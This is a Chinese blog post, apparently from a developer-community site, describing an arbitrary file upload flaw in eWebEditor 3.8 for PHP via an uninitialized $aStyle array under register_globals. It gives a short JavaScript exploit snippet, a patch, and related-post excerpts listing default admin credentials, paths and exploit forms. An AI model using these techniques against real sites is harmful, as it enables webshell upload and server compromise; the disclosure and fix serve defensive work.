ewebeditor php漏洞,ewebeditor for php任意文件上传漏洞

最新推荐文章于 2024-05-12 22:26:46 发布
最新推荐文章于 2024-05-12 22:26:46 发布
阅读量348 收藏
点赞数
文章标签: ewebeditor php漏洞

此漏洞仅测试了最新版v3.8,不知道低版本是否存在此漏洞。PHP版本的ewebeditor并没有使用数据库来保存配置信息,所有信息位于php/config.php中,代码如下:

$sUsername = "admin";

$sPassword = "admin";[separator]

$aStyle[1] = "gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格,部分常用按钮,标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1";

........

它将所有的风格配置信息保存为一个数组$aStyle,在register_global为on的情况下我们可以任意添加自己喜欢的风格,然后就可以在自己添加的风格中可以随意定义可上传文件类型。

这漏洞成因很简单,下面给个exp

URL:

file:

function fsubmit(){

form = document.forms[0];

form.action = form.url.value+'php/upload.php?action=save&type=FILE&style=toby57&language=en';

alert(form.action);

form.submit();

}

漏洞修补方法:

初始化数组$aStyle

$sUsername = "admin";

$sPassword = "admin";

$aStyle = array();

$aStyle[1] = "gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格,部分常用按钮,标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1";

本文由站长原创或收集,不代表本站立场,如若转载,请注明出处:http://www.yesck.com/post/33/

iff-qyc
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ewebeditor 3.8 任意文件上传漏洞解析
ice
11-09 1150
   首先这个是别人早都发出来的一个漏洞,exp也写好了,如下 <title>eWebeditoR3.8 for php任意文件上EXP</title> <form action="" method=post enctype="multipart/form-data"> <INPUT TYPE="hidden" name="MAX_F
文件上传(包括编辑器上传漏洞绕过总结(适用于pte考试、ctf及常规测试、修复任意文件上传漏洞可做参考)
weixin_42075643的博客
03-28 3840
文件上传绕过总结;编辑器文件上传;渗透测试记录
22-任意文件上传与编辑器漏洞Ewebeditor、fckeditor、CKFinder、southidceditor等)(四)
最新发布
XLbb的博客
05-12 983
Ewebeditor是基于浏览器的、所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件(如:Word)所具有的强大可视编辑功能。WEB开发人员可以用她把传统的多行文本输入框替换为可视化的富文本输入框,使最终用户可以可视化的发布HTML格式的网页内容。eWebEditor!已基本成为网站内容管理发布的必备工具!
ewebeditor上传漏洞
ice
10-10 659
<H3>ewebeditor asp版 2.1.6 上传漏洞利用程序----</H3><br><br> <form action="http://xxxx/include/wedit/upload.asp?action=save&type=IMAGE&style=standard' and 1=2 union select S...
web安全-上传漏洞-Ewebeditor编辑器漏洞利用
Coisini的博客
05-31 7943
Ewebeditor简介 漏洞利用 ***默认路径就不一定了,有可能是“edit/admin_login.asp”或者“admin/edit/admin_login.asp”。(默认密码后台:admin,admin) 如果eWebEditor的后台用户名和密码都已经被修改了,那么我们还可以通过下载数据库来获得管理员用户名和密码,数据库默认的下载路径为“/db/ewebeditor.mdb”。下载...
ewebeditor编辑器漏洞
arissa666的博客
10-18 527
网页在线编辑器,权限限制不严格,弱口令,文件过滤出现问题。
Ewebeditor 文件上传问题
10-29
Ewebeditor 上传的文件要么是直接播放或显示的,要么是用固定的格式做一个链接。
PHP网页 Ewebeditor 编辑器嵌入方法
10-29
因为ewebeditor编辑器的功能强大,容易扩展等原因,一直是大家比较喜爱的编辑器,所以下面介绍下ewebeditor如何跟php结合。
eWebEditor 上传文件提示格式不正确的解决方法
10-29
eWebEditor上传个别图片时出现:请选择一个有效的文件,支持的格式有(GIF|JPG|JPEG|BMP|PNG)!,在WINDOWSXP下使用该组件正常,却在WINDOWS2003上提示
eWebEditor Version 11.2 for PHP 多语言商业版 修改弹出窗口提示
04-09
`uploads`目录是eWebEditor用于存放用户上传文件的地方。用户在编辑器中插入图片或者其他文件时,这些文件会被保存在这个目录下。为了保证网站运行的稳定性和安全性,开发者需要对这个目录进行适当的权限设置和大小...
eWebEditor Version 11.1 for PHP 多语言商业版 修改弹出窗口提示
02-19
而"uploads"目录则是用户上传的文件存储位置,eWebEditor支持用户直接上传图片和其他媒体文件,丰富了网页内容。 总的来说,eWebEditor Version 11.1 for PHP以其强大的编辑功能、多语言支持和优化的窗口提示,为...
eWebEditor V7.8 for PHP去版权版-中文商业破解版
12-26
eWebEditor是一款在线HTML编辑器软件,只需要一行代码就可以完成eWebEditor的调用。 本人已经使用过 完全没有问题的 后台用户名密码都是admin
eWebEditor7-修复漏洞上传
11-09
增加某些实用功能,修正多处已知BUG;上传文件接口设置了防止木马程序,过滤有害代码的功能 目录 ASP   文件 I.JS// eWebEditor 7.0 设置文件   文件 upload.asp//上传文件,不提供上传,就把文件名修改其它名或者删除   文件 upfileclass.asp//上传文件   文件 browse.asp//浏览上传文件 目录 sharefile   目录 media//放共享视频文件   目录 image//放共享图片文件   目录 flash//放共享FLASH文件   目录 0ther//放共享办公文件
ewebeditor 6.2 for php 完整处理版本
03-08
完整的商业版本,后台提示未授权,不用理睬,所有操作都正常,包括上传文件。 花了点时间将php和js文件都处理过了。 希望大家使用愉快。
Ewebeditor 的一些漏洞总结
eldn__的专栏
06-23 9985
于是像windows一样被黑客们挖掘出很多漏洞,大家莫急,笔者Minghacker总结前人基础,一一道来。  对于目前asp版本的ewebeditor编辑器漏洞主要分为以下7点:  默认,遍历目录漏洞,一句话,注入,构造,cookie欺骗,社工(踩脚印入侵),  NO1.ewebeditor编辑器一般默认数据库路径是db/ewebeditor.mdb  默认的后台路径是admi
ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法
weixin_34195142的博客
03-15 774
这个编辑器按脚本分主要有4个版本,ASP/ASPX/PHP/JSP 每个版本都有可以利用的漏洞。判断网站是否使用了eWebEditor查看程序源代码,看看源码中是否存在类似”ewebeditor.asp?id=”语句,只要有此语句的存在,就能判断网站确实使用了WEB编辑器。另外一种方法就是站上新闻或者其他板块上找图片、附件等的链接,是否为admin/eWebEditor/UploadFile/xx...
Web安全之文件上传漏洞详解
hack0919的博客
04-18 3531
文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果
文件上传漏洞-08】常见编辑器上传以及常见的CMS 上传漏洞
m0_64378913的博客
07-12 2205
编辑器就是网站后台编辑网页的在线编辑器,会自动集成文件上传功能,这些编辑器的某些版本也存在文件上传漏洞,从而进行getshell(1)ewebeditor(比较古老的编辑器)(2)fckeditor利用小马拉大马也是一个惯用伎俩!CMS 又叫网站内容管理系统(网站的模版,帮助我们快速建站,我们会在这个网站模板上做二次开发),市面上很多开源的CMS 的历史版本有很多都存在着文件上传漏洞,但是产生文件上传漏洞的原因不尽相同,情景也不似本章上文中介绍的那样“直白”。类似的CMS 有很多,比如常见的dedeCMS(
常见编辑器漏洞汇总【超全】(转载)
00勇士王子的博客
09-15 4829
以前挖某站发现使用了编辑器,想用通用漏洞探一探,奈何当时无从下手,这件事就放到了我的心上,就去学习了此方面的知识,了解了一些思路,把编辑器漏洞汇总到了一起,分享给想要了解这方面漏洞的小伙伴首先介绍什么是编辑器:编辑器是非常好用的网页在线编辑器,顾名思义就是让我们的用户可以在网页上进行文本的编辑,可以在网页上设置字体的样式段落行间距类似于用word编辑比较方便,并将工具生成得到的html样式插入到数据库中我们可以右键,审查元素,查看js 文件和文件内容标识。
ewebeditor漏洞
08-23
综上所述,ewebeditor存在文件上传漏洞,攻击者可以通过利用漏洞访问服务器上的文件,并进行恶意操作。建议用户及时更新并使用最新版本的编辑器,以避免潜在的安全风险。<span class="em">1</span><span class="em">...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值